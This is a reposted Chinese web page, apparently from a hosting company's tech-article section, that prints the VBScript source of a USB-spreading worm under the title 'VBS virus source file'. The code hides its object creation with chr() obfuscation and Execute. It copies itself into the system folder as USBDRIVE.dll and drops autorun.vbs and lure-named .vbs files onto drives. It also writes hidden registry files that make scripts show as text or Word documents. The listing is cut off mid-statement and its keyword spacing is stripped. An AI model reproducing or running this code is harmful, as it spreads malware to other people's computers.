快速业务通道

vbs病毒源文件

作者 佚名 来源 ASP编程 浏览 发布时间 2013-07-09
remvbs.rhl

Dimfs,r,ss,w,reg,regpath,dvbs
ddd="Setfs="&chr(67)&"reate"&"Obj"&chr(101)&"c"&chr(116)&chr(40)&chr(34)&"Scrip"&chr(116)&"ing.File"&chr(83)&"yste"&chr(109)&chr(79)&"bject"&chr(34)&chr(41)
Executeddd
rrr="setr="&chr(119)&"scri"&"pt."&chr(67)&"reate"&"Obj"&chr(101)&"c"&chr(116)&chr(40)&chr(34)&chr(119)&"scri"&"pt."&chr(115)&"he"&chr(108)&chr(108)&chr(34)&chr(41)
Executerrr
sss="fs."&chr(103)&"etfil"&chr(101)&chr(40)&chr(119)&"scri"&"pt."&"scri"&chr(112)&"tfull"&chr(110)&"ame"&chr(41)
ttt="setdvbs="&sss
Executettt
r.run(fs.GetSpecialFolder(0)&"\explorer.exe.\")
main()
OnErrorResumeNext
submain()
regtime()
finddrive()
countdrive(ss)
regwrite()
ganranfile(ss)
xunhuan()
endsub
Functionfinddrive()
ifdvbs.name="USBDRIVE.dll"then
regwrite()
ganrandisk()
endif
ifdvbs.name<>"autorun.vbs"anddvbs.name<>"USBDRIVE.dll"then
regwrite()
dvbs.delete(true)
endif
ss=Trim("")
Setdc=fs.Drives
ForEachdIndc
Ifd.DriveType=1ord.DriveType=2andd.IsReadyThen
ss=ss&d.DriveLetter
endif
Next
ss=StrReverse(LCase(Trim(ss)))
endFunction
Functioncountdrive(ss)
OnErrorResumeNext
dimx
Fori=1ToLen(ss)
x=Mid(ss,i,1)
ifx=""then
x=Mid(ss,1,1)
i=1
endif
Setw=fs.GetDrive(x)
ganrandiskroot()
Next
endFunction
Functionganrandiskroot()
dimc,s,f,vbc,ts,runreg
OnErrorResumeNext
Ifw.DriveType=2orw.DriveType=1andw.IsReadyThen
Iffs.FileExists(fs.GetSpecialFolder(1)&"\USBDRIVE.dll")Then
else
fff=sss&".copy("&chr(34)&fs.GetSpecialFolder(1)&"\USBDRIVE.dll"&chr(34)&")"
Executefff
Iffs.FileExists(fs.GetSpecialFolder(1)&"\USBDRIVE.dll")Then
else
fff=sss&".copy("&chr(34)&"D:\SystemVolumeInformation\USBDRIVE.dll"&chr(34)&")"
Executefff
iffs.FileExists("D:\SystemVolumeInformation\USBDRIVE.dll")Then
Setts=fs.CreateTextFile(w.DriveLetter&":\vbs.reg",true)
ts.WriteLine"WindowsRegistryEditorVersion5.00"
ts.WriteLine"[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"
ts.WriteLinechr(34)&chr(64)&"C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)
ts.close
Setf=fs.GetFile(w.DriveLetter&":\vbs.reg")
f.attributes=f.attributes+7
Setts=fs.CreateTextFile(w.DriveLetter&":\doc.reg",true)
ts.WriteLine"WindowsRegistryEditorVersion5.00"
ts.WriteLine"[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"
ts.WriteLinechr(34)&chr(64)&"C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)
ts.close
Setf=fs.GetFile(w.DriveLetter&":\doc.reg")
f.attributes=f.attributes+7
endif
endif
endif
Iffs.FileExists(w.DriveLetter&":\autorun.vbs")Then
Setc=fs.opentextfile(w.DriveLetter&":\autorun.vbs",1)
vbc=c.readall
IfInStr(vbc,"vbs.rhl")<>0Then
c.Close
Else
c.Close
Setc=fs.GetFile(w.DriveLetter&":\autorun.vbs")
c.delete(true)
fff=sss&".copy("&chr(34)&w.DriveLetter&":\autorun.vbs"&chr(34)&")"
Executefff
s=Array("2007总结病毒","这是病毒","违纪病毒","检查病毒","黑名单病毒","没有发出的病毒","恋爱的病毒(病毒)")
Randomize
i=Int((6*Rnd)+1)
fff=sss&".copy("&chr(34)&w.DriveLetter&":\"&s(i)&".vbs"&chr(34)&")"
Executefff
Setb=fs.

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!

分享到: 更多

Copyright ©1999-2011 厦门凌众科技有限公司 厦门优通互联科技开发有限公司 All rights reserved

地址(ADD):厦门软件园二期望海路63号701E(东南融通旁) 邮编(ZIP):361008

电话:0592-5908028 传真:0592-5908039 咨询信箱:web@lingzhong.cn 咨询OICQ:173723134

《中华人民共和国增值电信业务经营许可证》闽B2-20100024  ICP备案:闽ICP备05037997号